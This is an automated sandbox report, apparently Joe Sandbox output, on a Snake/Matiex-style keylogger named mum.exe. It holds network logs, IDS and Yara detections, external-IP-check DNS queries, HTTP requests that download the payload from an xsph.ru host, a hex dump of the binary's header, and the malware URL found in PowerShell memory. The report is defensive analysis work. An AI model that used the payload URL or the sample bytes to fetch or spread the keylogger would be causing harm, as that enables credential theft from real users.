Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 141.8.192.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49173 -> 132.226.8.169:80
Source: Traffic	Snort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49174 -> 193.122.130.0:80
Source: Traffic	Snort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.22:49175 -> 193.122.130.0:80

May check the online IP address of the machine

Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mum.exe	DNS query: name: checkip.dyndns.org

Yara detected Generic Downloader

Source: Yara match	File source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View	ASN Name: UTMEMUS UTMEMUS
Source: Joe Sandbox View	ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US

Source: global traffic

HTTP traffic detected: GET /mum.exe HTTP/1.1Host: f0705964.xsph.ruConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 23 Aug 2022 11:42:48 GMTContent-Type: application/octet-streamContent-Length: 829952Last-Modified: Mon, 22 Aug 2022 22:52:30 GMTConnection: keep-aliveETag: "630408ae-caa00"Expires: Tue, 30 Aug 2022 11:42:48 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 23 Aug 2022 11:42:52 GMTContent-Type: application/octet-streamContent-Length: 829952Last-Modified: Mon, 22 Aug 2022 22:52:30 GMTConnection: keep-aliveETag: "630408ae-caa00"Expires: Tue, 30 Aug 2022 11:42:52 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06

Source: global traffic	HTTP traffic detected: GET /mum.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: f0705964.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://f0705964.xsph.ru
Source: powershell.exe, 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: httP://f0705964.xsph.ru/mum.exe
Source: powershell.exe, 00000009.00000002.947506272.000000000387A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://f0705964.xsph.ru/mum.exePE
Source: powershell.exe, 00000004.00000002.919275004.000000000364A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: httP://f0705964.xsph.ru/mum.exePEQ
